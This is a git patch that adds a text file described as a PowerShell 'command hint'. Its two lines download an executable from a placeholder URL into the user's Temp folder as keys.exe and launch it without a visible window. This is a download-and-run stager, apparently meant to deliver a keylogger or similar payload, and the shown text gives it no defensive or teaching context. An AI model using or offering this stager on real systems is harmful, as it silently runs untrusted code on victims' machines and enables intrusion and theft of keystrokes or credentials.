From 3f03468ae2bdbf22f3017741c7422ca379492cc6 Mon Sep 17 00:00:00 2001 From: Daniel Svitan Date: Mon, 24 Mar 2025 12:31:48 +0100 Subject: [PATCH] :zap: Adds windows powershell command hint --- windows-powershell.txt | 2 ++ 1 file changed, 2 insertions(+) create mode 100644 windows-powershell.txt diff --git a/windows-powershell.txt b/windows-powershell.txt new file mode 100644 index 0000000..3a87a31 --- /dev/null +++ b/windows-powershell.txt @@ -0,0 +1,2 @@ +Invoke-WebRequest URL -OutFile .\AppData\Local\Temp\keys.exe +Start-Process -FilePath .\AppData\Local\Temp\keys.exe -NoNewWindow